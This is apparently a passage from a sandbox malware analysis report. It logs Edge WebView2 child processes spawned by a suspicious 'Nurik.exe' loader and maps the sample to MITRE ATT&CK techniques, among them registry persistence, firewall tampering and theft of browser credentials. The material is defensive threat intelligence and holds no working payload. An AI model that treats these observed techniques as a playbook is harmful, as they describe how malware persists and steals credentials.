      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:5808
    - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\NTFLoader\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\NTFLoader\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=132.0.2957.140 --initial-client-data=0x1a0,0x1a4,0x1a8,0x17c,0x120,0x7fff7d14b078,0x7fff7d14b084,0x7fff7d14b090
        5⤵
        
        PID:3800
    - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe" --type=gpu-process --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\NTFLoader\EBWebView" --webview-exe-name=Nurik.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1852,i,4235973866189611275,7213510604668026024,262144 --variations-seed-version --mojo-platform-channel-handle=1848 /prefetch:2
        5⤵
        
        PID:4120
    - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\NTFLoader\EBWebView" --webview-exe-name=Nurik.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --always-read-main-dll --field-trial-handle=2096,i,4235973866189611275,7213510604668026024,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:3
        5⤵
        
        PID:5040
    - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\NTFLoader\EBWebView" --webview-exe-name=Nurik.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --always-read-main-dll --field-trial-handle=2348,i,4235973866189611275,7213510604668026024,262144 --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:8
        5⤵
        
        PID:1328
    - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\NTFLoader\EBWebView" --webview-exe-name=Nurik.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --always-read-main-dll --field-trial-handle=3768,i,4235973866189611275,7213510604668026024,262144 --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:1
        5⤵
        
        PID:5176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Process Discovery

T1057

Query Registry

System Information Discovery